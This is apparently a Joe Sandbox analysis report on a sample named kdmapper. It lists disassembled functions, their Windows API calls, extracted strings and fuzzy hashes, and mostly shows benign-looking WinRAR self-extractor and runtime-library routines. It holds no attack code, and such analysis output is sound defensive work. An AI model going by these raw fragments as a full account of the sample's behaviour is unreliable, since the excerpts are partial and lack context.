Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 37d95ba8b9724fef7314348083656c59c0c4867a0ff4a34b832b9e04b191824a
Instruction ID: e154ae7a7655d2e0f53941fba149a760ad844c76af297a00a249daca52b0d861
Opcode Fuzzy Hash: 37d95ba8b9724fef7314348083656c59c0c4867a0ff4a34b832b9e04b191824a
Instruction Fuzzy Hash: 07C12771904B24ABDB21DB70EC41FEEB3AAAF08300F00455EF956E7282D730AA44CF65

Function 0062E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0062E30E

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

Part of subcall function 00631DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00661030,00000200,0062D928,00000000,?,00000050,00661030), ref: 00631DC4

_strlen.LIBCMT ref: 0062E32F
SetDlgItemTextW.USER32(?,0065E274,?), ref: 0062E38F
GetWindowRect.USER32(?,?), ref: 0062E3C9
GetClientRect.USER32(?,?), ref: 0062E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0062E475
GetWindowRect.USER32(?,?), ref: 0062E4A2
SetWindowTextW.USER32(?,?), ref: 0062E4DB
GetSystemMetrics.USER32(00000008), ref: 0062E4E3
GetWindow.USER32(?,00000005), ref: 0062E4EE
GetWindowRect.USER32(00000000,?), ref: 0062E51B
GetWindow.USER32(00000000,00000002), ref: 0062E58D

Strings

te, xrefs: 0062E34A
$%s:, xrefs: 0062E302
CAPTION, xrefs: 0062E4BD
d, xrefs: 0062E3F5

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$te
API String ID: 2407758923-4090530616
Opcode ID: 66038aa8e120fb57ce5d0a825d05495298d251bb30981d543167be83c673d786
Instruction ID: 903b0f0c7fc8172af7f49dc165177b169aa44d538d2a3682333167beba81db07
Opcode Fuzzy Hash: 66038aa8e120fb57ce5d0a825d05495298d251bb30981d543167be83c673d786
Instruction Fuzzy Hash: CE819272108311AFD710DF68DD89A6FBBEAEB88B04F04492DFA84E7350D675E9058B52

Function 0064CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0064CB66

Part of subcall function 0064C701: _free.LIBCMT ref: 0064C71E
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C730
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C742
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C754
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C766
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C778
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C78A
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C79C
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7AE
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7C0
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7D2
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7E4
Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7F6

_free.LIBCMT ref: 0064CB5B

Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4

_free.LIBCMT ref: 0064CB7D
_free.LIBCMT ref: 0064CB92
_free.LIBCMT ref: 0064CB9D
_free.LIBCMT ref: 0064CBBF
_free.LIBCMT ref: 0064CBD2
_free.LIBCMT ref: 0064CBE0
_free.LIBCMT ref: 0064CBEB
_free.LIBCMT ref: 0064CC23
_free.LIBCMT ref: 0064CC2A
_free.LIBCMT ref: 0064CC47
_free.LIBCMT ref: 0064CC5F

Strings

he, xrefs: 0064CC0E

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: he
API String ID: 161543041-1137534704
Opcode ID: 38692688310e0234c75b49d5db3c996b50f4289e7080b604ffa8e8b994d88114
Instruction ID: fba840f19669cab7f0df35c7a7daef48835c2ac55b289668841ed765677fddec
Opcode Fuzzy Hash: 38692688310e0234c75b49d5db3c996b50f4289e7080b604ffa8e8b994d88114
Instruction Fuzzy Hash: AC315031A027059FEBA1AA79D846B9A77EBEF50320F14541DE558D7392DF31EC40CB14

Function 006496F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00649705

Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4

_free.LIBCMT ref: 00649711
_free.LIBCMT ref: 0064971C
_free.LIBCMT ref: 00649727
_free.LIBCMT ref: 00649732
_free.LIBCMT ref: 0064973D
_free.LIBCMT ref: 00649748
_free.LIBCMT ref: 00649753
_free.LIBCMT ref: 0064975E
_free.LIBCMT ref: 0064976C

Strings

0de, xrefs: 006496FC

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0de
API String ID: 776569668-3882026998
Opcode ID: 52b59a7e432db3178a8ae262a8a331157aa1d909d1786c28b480f950e767dd9b
Instruction ID: c96695097d2542b479fcd6f43f43e1d74b1b74088ceebedf82ccfd2bc3697b57
Opcode Fuzzy Hash: 52b59a7e432db3178a8ae262a8a331157aa1d909d1786c28b480f950e767dd9b
Instruction Fuzzy Hash: A411B676911109BFCB45EF94C842CDD3BB6EF14350B5154A9FA088F262DE32DE509B98

Function 00639711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00639736
_wcslen.LIBCMT ref: 006397D6
GlobalAlloc.KERNEL32(00000040,?), ref: 006397E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00639806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0063982D

Strings

</html>, xrefs: 006397B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00639760
<html>, xrefs: 00639755, 0063978E
F0wnc, xrefs: 0063982D
utf-8"></head>, xrefs: 0063976B

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: F0wnc$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-1887336772
Opcode ID: 50c77fd1c3e30189b37b0003898f46a90b73a18c82a5600e6828c19ac92b4827
Instruction ID: 17dcb0ba642c022e81ff504b99c1b5a664aebc000abad8fca720125b8b663771
Opcode Fuzzy Hash: 50c77fd1c3e30189b37b0003898f46a90b73a18c82a5600e6828c19ac92b4827
Instruction Fuzzy Hash: 8B314A321093117AE725AB34DC06FAF779BDF83711F15051EF402962D2EBA09A4887F9

Function 0063D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0063D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0063D6ED

Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0063D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0063D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0063D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0063D75D
DeleteObject.GDI32(00000000), ref: 0063D764
GetWindow.USER32(00000000,00000002), ref: 0063D76D

Strings

STATIC, xrefs: 0063D6F3

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 4fad4820eec9d11398b4e710ad31a46779c437f54c5b6363c1685e36f20eb15f
Instruction ID: e942c52bccd649305c446c7ea55cf40d8b5a406d62388c6c2faa65e168160fa4
Opcode Fuzzy Hash: 4fad4820eec9d11398b4e710ad31a46779c437f54c5b6363c1685e36f20eb15f
Instruction Fuzzy Hash: 221106726003207BE3216BB0EC4AFEF766FAF44B11F005214FA91A62D1DA648B0547FA

Function 00642E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00642F50
___TypeMatch.LIBVCRUNTIME ref: 0064305E
_UnwindNestedFrames.LIBCMT ref: 006431B0
CallUnexpected.LIBVCRUNTIME ref: 006431CB
_abort.LIBCMT ref: 006431D0

Strings

csm, xrefs: 00642EDB
csm, xrefs: 00642E6E
csm, xrefs: 00642F87

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 12e2fe9f55861c26f59c3b1fafbf026ab2855c0d3cf35a870bed7a6a3ebc89ad
Instruction ID: 6a591a4ba9aef212867677621fc7bcbb668d86de9933a6c450419646de2fc901
Opcode Fuzzy Hash: 12e2fe9f55861c26f59c3b1fafbf026ab2855c0d3cf35a870bed7a6a3ebc89ad
Instruction Fuzzy Hash: 6DB1697180022AEFCF69DFA4C8819AEBBB7BF14310F64415AF8116B312D731EA55CB95

Function 0062AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0062AF29

Strings

WQL, xrefs: 0062AFDC
Windows 10, xrefs: 0062B0C2
Name, xrefs: 0062B0B0
SELECT * FROM Win32_OperatingSystem, xrefs: 0062AFCA
nc, xrefs: 0062AFC0
ROOT\CIMV2, xrefs: 0062AF5C

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nc
API String ID: 3519838083-655254800
Opcode ID: 3dedb1d38528461a1e2d5f61ab2e2ace52111f2f0909e02c70b87a91bd6c9391
Instruction ID: f8caa71a49654da12936231923d32b656f30fc9f84c8fb55a715ebc00b59abfb
Opcode Fuzzy Hash: 3dedb1d38528461a1e2d5f61ab2e2ace52111f2f0909e02c70b87a91bd6c9391
Instruction Fuzzy Hash: E8717E71A00A29AFDB15DFA4DC959AEB7BAFF48751F04015DE512A73A0CB306E02CF50

Function 00626FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00626FAA
_wcslen.LIBCMT ref: 00627013
_wcslen.LIBCMT ref: 00627084

Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00

Strings

SeRestorePrivilege, xrefs: 00626FC2
UNC\, xrefs: 00627051
\??\, xrefs: 0062702B
SeCreateSymbolicLinkPrivilege, xrefs: 00626FCC

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 457328747e78366255740207eccbefddffeceef56290aaeea9306b970e3f701d
Instruction ID: 26c115a33687aa444270498e648b43a1e90d8391b18ad1442f31495505dfc87a
Opcode Fuzzy Hash: 457328747e78366255740207eccbefddffeceef56290aaeea9306b970e3f701d
Instruction Fuzzy Hash: FE4138B1D08B64BAEF20E770BC46FEE776F9F05740F040459F945A6282D6706A488F25

Function 0063B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

EndDialog.USER32(?,00000001), ref: 0063B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0063B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0063B650
SetWindowTextW.USER32(?,?), ref: 0063B661
GetDlgItem.USER32(?,00000065), ref: 0063B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0063B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0063B694

Strings

LICENSEDLG, xrefs: 0063B5D4

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 9ca0f2ba0665fb34210e827e0249159e8604ed2fc559f5464371aa82b8b35828
Instruction ID: 1836e6c4463e972bf78f8774690ab6c2192e2ece35ba30c7aa51c044968bd14c
Opcode Fuzzy Hash: 9ca0f2ba0665fb34210e827e0249159e8604ed2fc559f5464371aa82b8b35828
Instruction Fuzzy Hash: 6821F332204225BBD3119F65ED4AF7B3B6FEB47F45F012018F704A62A2CB92990197B5

Function 0063FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F0DD8672,00000001,00000000,00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE14
SysAllocString.OLEAUT32(00000000), ref: 0063FE1F
_com_issue_error.COMSUPP ref: 0063FE48
_com_issue_error.COMSUPP ref: 0063FE52
GetLastError.KERNEL32(80070057,F0DD8672,00000001,00000000,00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE57
_com_issue_error.COMSUPP ref: 0063FE6A
GetLastError.KERNEL32(00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE80
_com_issue_error.COMSUPP ref: 0063FE93

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 981e0cb576babb2864dab717d92f6e2950be4faec889818b76f12735956a6277
Instruction ID: aa97ab7b04181cd1883bb9c17f27cb23f7a39ff4aee1dfeed967b0fd37ac7680
Opcode Fuzzy Hash: 981e0cb576babb2864dab717d92f6e2950be4faec889818b76f12735956a6277
Instruction Fuzzy Hash: 84419471E00315ABDB109F65D845BAFBBAAEF44B51F10423AF905E73A1DB34990087E5

Function 00629382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00629387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 006293AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 006293C9

Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2

Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1

_swprintf.LIBCMT ref: 00629465

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

MoveFileW.KERNEL32(?,?), ref: 006294D4
MoveFileW.KERNEL32(?,?), ref: 00629514

Strings

rtmp%d, xrefs: 0062944E

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: c0bbdd02465a59d61fceb45ac22dbd47d71402d388892719e1bce2e3aee6fd69
Instruction ID: 17f4e283d0a8087833957a69641cab2a04bf4ec8749a2fec23e49cdb7e1076e7
Opcode Fuzzy Hash: c0bbdd02465a59d61fceb45ac22dbd47d71402d388892719e1bce2e3aee6fd69
Instruction Fuzzy Hash: BE41B671900674A6DF61EFA0EC45EDE737EAF81340F0048A9B609F3151DA388B898F74

Function 00621100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0062112B
_wcslen.LIBCMT ref: 00621153
_wcslen.LIBCMT ref: 00621182
_wcslen.LIBCMT ref: 006211A9

Strings

pc, xrefs: 00621205, 00621233
Uc, xrefs: 0062120D, 0062123B
zc, xrefs: 00621219

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: Uc$pc$zc
API String ID: 176396367-3486765131
Opcode ID: 68de902099b8a6b1dc08f9002ad61cab3be1a9f83676a736b1846e38644366dd
Instruction ID: 169948fffabace6d28b0c6edbb19540c99fbb6535d43d16e5a231c352332c448
Opcode Fuzzy Hash: 68de902099b8a6b1dc08f9002ad61cab3be1a9f83676a736b1846e38644366dd
Instruction Fuzzy Hash: C641C3719016799BCB619F689C0A9DF7BB9EF11710F00011EF946EB345DA30AE498BA4

Function 00639ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00639EEE
GetWindowRect.USER32(?,00000000), ref: 00639F44
ShowWindow.USER32(?,00000005,00000000), ref: 00639FDB
SetWindowTextW.USER32(?,00000000), ref: 00639FE3
ShowWindow.USER32(00000000,00000005), ref: 00639FF9

Strings

c, xrefs: 00639F52, 00639F87
RarHtmlClassName, xrefs: 00639FA5

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Window$Show$RectText
String ID: c$RarHtmlClassName
API String ID: 3937224194-2308181962
Opcode ID: 0f65ad5fa1ef8cdf13642a60f1087ff7abf5262ccb2baad988bb940a2dd2c364
